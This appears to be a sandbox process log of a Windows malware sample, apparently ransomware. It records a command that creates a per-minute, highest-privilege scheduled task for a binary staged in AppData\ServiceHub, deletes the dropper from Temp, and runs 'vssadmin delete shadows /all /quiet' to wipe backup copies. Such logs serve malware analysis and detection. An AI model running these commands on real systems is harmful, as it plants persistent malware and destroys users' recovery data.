cmd.exe "C:\Windows\System32\cmd.exe" /C chcp 65001 && ping 127.0.0.1 && schtasks /create /tn "lbcr" /sc MINUTE /tr "C:\Users\test22\AppData\Local\ServiceHub\lbcr.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Users\test22\AppData\Local\Temp\lbcr.exe" &&START "" "C:\Users\test22\AppData\Local\ServiceHub\lbcr.exe"
2524chcp.com chcp 65001
2596PING.EXE ping 127.0.0.1
2640schtasks.exe schtasks /create /tn "lbcr" /sc MINUTE /tr "C:\Users\test22\AppData\Local\ServiceHub\lbcr.exe" /rl HIGHEST /f
2760chcp.com chcp 65001
2536vssadmin.exe vssadmin delete shadows /all /quiet
2500explorer.exe C:\Windows\Explorer.EXE
1236